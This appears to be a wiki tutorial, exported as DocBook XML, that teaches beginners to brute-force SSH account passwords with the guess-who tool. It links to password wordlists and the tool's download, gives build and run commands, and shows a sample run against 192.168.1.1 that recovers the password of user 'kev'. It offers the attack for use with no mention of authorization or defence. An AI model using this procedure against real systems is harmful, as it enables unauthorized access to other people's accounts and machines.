<?xml version="1.0" encoding="utf-8"?><!DOCTYPE article  PUBLIC '-//OASIS//DTD DocBook XML V4.4//EN'  'http://www.docbook.org/xml/4.4/docbookx.dtd'><article><articleinfo><title>BruteForce_ssh_eng</title><revhistory><revision><revnumber>10</revnumber><date>2008-03-18 17:28:28</date><authorinitials>localhost</authorinitials><revremark>converted to 1.6 markup</revremark></revision><revision><revnumber>9</revnumber><date>2007-06-20 14:27:51</date><authorinitials>ClauzClauz</authorinitials><revremark>tolto CategoryEnglishPages</revremark></revision><revision><revnumber>8</revnumber><date>2007-06-04 11:33:52</date><authorinitials>ClauzClauz</authorinitials></revision><revision><revnumber>7</revnumber><date>2007-06-04 11:33:29</date><authorinitials>ClauzClauz</authorinitials><revremark>added to CategoryEnglishPages</revremark></revision><revision><revnumber>6</revnumber><date>2007-06-04 11:33:15</date><authorinitials>ClauzClauz</authorinitials></revision><revision><revnumber>5</revnumber><date>2007-03-31 12:39:20</date><authorinitials>ac3bf1</authorinitials></revision><revision><revnumber>4</revnumber><date>2007-03-31 12:13:28</date><authorinitials>ac3bf1</authorinitials></revision><revision><revnumber>3</revnumber><date>2007-03-31 12:13:02</date><authorinitials>ac3bf1</authorinitials></revision><revision><revnumber>2</revnumber><date>2007-03-31 12:09:04</date><authorinitials>ac3bf1</authorinitials></revision><revision><revnumber>1</revnumber><date>2007-03-31 12:05:35</date><authorinitials>ac3bf1</authorinitials></revision></revhistory></articleinfo><section><title>Brute Force ssh (for n00bs)</title><para>Guess-who is a password brute force utility for attacking Secure Shell Version 2 accounts. </para><para> It is available from <ulink url="http://packetstormsecurity.org/"/> </para><section><title>Required Files and programs</title><para>It is <emphasis role="strong"> NOT </emphasis> required to download ALL files here. Please read <emphasis role="strong"> CAREFULLY! </emphasis> </para><itemizedlist><listitem><para>Choose <emphasis role="strong"> 1 </emphasis> from the following: </para><itemizedlist><listitem override="none"><informaltable><tgroup cols="4"><colspec colname="col_0"/><colspec colname="col_1"/><colspec colname="col_2"/><colspec colname="col_3"/><tbody><row rowsep="1"><entry colsep="1" rowsep="1"><para> <ulink url="http://www.ac3bf1.org/files/sec/all_merged.tar.gz">all_merged.tar.gz</ulink> </para></entry><entry colsep="1" rowsep="1"><para> <ulink url="http://www.ac3bf1.org/files/sec/all_merged.zip">all_merged.zip</ulink> </para></entry><entry colsep="1" rowsep="1"><para> (<emphasis role="strong">~20MB!</emphasis> - 67MB uncompressed) </para></entry><entry colsep="1" rowsep="1"><para> - Several passwords </para></entry></row><row rowsep="1"><entry colsep="1" rowsep="1"><para> <ulink url="http://www.ac3bf1.org/files/sec/common_merged.tar.gz">common_merged.tar.gz</ulink> </para></entry><entry colsep="1" rowsep="1"><para> <ulink url="http://www.ac3bf1.org/files/sec/common_merged.zip">common_merged.zip</ulink> </para></entry><entry colsep="1" rowsep="1"><para> (~6.5MB - 18MB uncompressed) </para></entry><entry colsep="1" rowsep="1"><para> - Selection of common passwords </para></entry></row></tbody></tgroup></informaltable></listitem></itemizedlist></listitem></itemizedlist><itemizedlist><listitem><para>Required Program: </para><itemizedlist><listitem override="none"><para><ulink url="http://www.ac3bf1.org/files/sec/guess-who-0.44.tgz">guess-who-0.44.tgz</ulink> (16.1 KB) - Linux program to Brute Force SSH </para></listitem></itemizedlist></listitem><listitem><para>In case you would want to personalize your password files, the folowing is a Wind0ws utility to merge text files </para><itemizedlist><listitem override="none"><para><ulink url="http://www.ac3bf1.org/files/sec/uumerge.zip">uumerge.zip</ulink> (55.1 KB) Wind0ws merging program </para></listitem></itemizedlist></listitem><listitem><para>The following are to be chosen if you want to create personalized password files. </para><itemizedlist><listitem override="none"><para><ulink url="http://www.ac3bf1.org/files/sec/common.tar.gz">common.tar.gz</ulink> | <ulink url="http://www.ac3bf1.org/files/sec/common.zip">common.zip</ulink> (35 files - 6322.2 KB) - Several passwords not merged <emphasis role="strong">(~6MB)</emphasis>  </para><para> <ulink url="http://www.ac3bf1.org/files/sec/all.tar.gz">all.tar.gz</ulink> | <ulink url="http://www.ac3bf1.org/files/sec/all.zip">all.zip</ulink> (46 files - 19130.5 KB) - Selection of common passwords not merged <emphasis role="strong">(~20MB!)</emphasis> </para></listitem></itemizedlist></listitem></itemizedlist></section><section><title>Procedure</title><para>Installation: </para><para> Download to the desired directory </para><screen><![CDATA[tar -zxvf guess-who-0.44.tgz
make]]></screen><para> Execution: </para><screen><![CDATA[[root@hacker guess-who]# ./b
]]><![CDATA[
guess-who SSH2 parallel passwd bruter (C) 2002 by krahmer@cs.uni-potsdam.de
]]><![CDATA[
Usage: ./b <-l login> <-h host> [-p port] <-1|-2> [-N nthreads] [-n ntries]
Use -1 for producer/consumer thread model, -2 for dumb parallelism. < Password file]]></screen><para>Expected output: </para><screen><![CDATA[[root@hacker guess-who]# ./b -l kev -h l192.168.1.1 -p 22 -2 < /passwords.txt
(!)056 ][ 00013 ][ 00000004.307361 ][ kev ][ arsenal ]
[ 00061 ][ 00015 ][ 00000004.066396 ][ kev ][ e3d ]]]></screen><para>As you can see the user kev has a password of arsenal </para></section></section></article>